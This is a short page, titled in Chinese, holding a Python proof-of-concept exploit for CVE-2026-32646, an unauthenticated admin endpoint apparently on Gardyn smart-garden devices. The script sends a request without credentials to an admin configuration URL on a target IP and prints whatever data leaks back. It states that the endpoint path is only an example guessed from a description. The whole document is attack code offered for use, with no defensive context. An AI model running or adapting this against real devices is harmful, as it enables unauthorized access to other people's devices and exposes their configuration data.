CVE-2026-32646 管理端点未授权访问漏洞

import requests # Exploit Title: Gardyn Device Unauthenticated Admin Access # CVE: CVE-2026-32646 # Target device IP address (Replace with actual target) target_ip = "192.168.1.100" # The vulnerable administrative endpoint (Example path based on description) vulnerable_url = f"http://{target_ip}/api/v1/admin/config" def exploit(): print(f"[*] Attempting to access unauthenticated endpoint: {vulnerable_url}") try: # Sending request without authentication headers response = requests.get(vulnerable_url, timeout=10) if response.status_code == 200: print("[+] Success! Administrative endpoint is accessible.") print("[+] Leaked Data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": exploit()